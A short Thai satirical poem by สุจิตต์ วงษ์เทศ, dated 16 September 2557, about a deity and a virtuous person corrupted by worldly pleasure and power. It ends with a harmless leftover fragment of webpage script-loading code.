ขาดพรหมจรรย์

 

เทวดาลงมาเสพโลกย์วิสัย

ต้องเนื้อเจริญใจไม่คืนสวรรค์

ผู้มีศีลเสพอำนาจขาดพรหมจรรย์

ต้องร่วมกันตีปี๊บเอาปี๊บคลุม

 

 สุจิตต์ วงษ์เทศ

อังคาร 16 กันยายน 2557}d.getElementsByTagName(‘head’)[0].appendChild(s);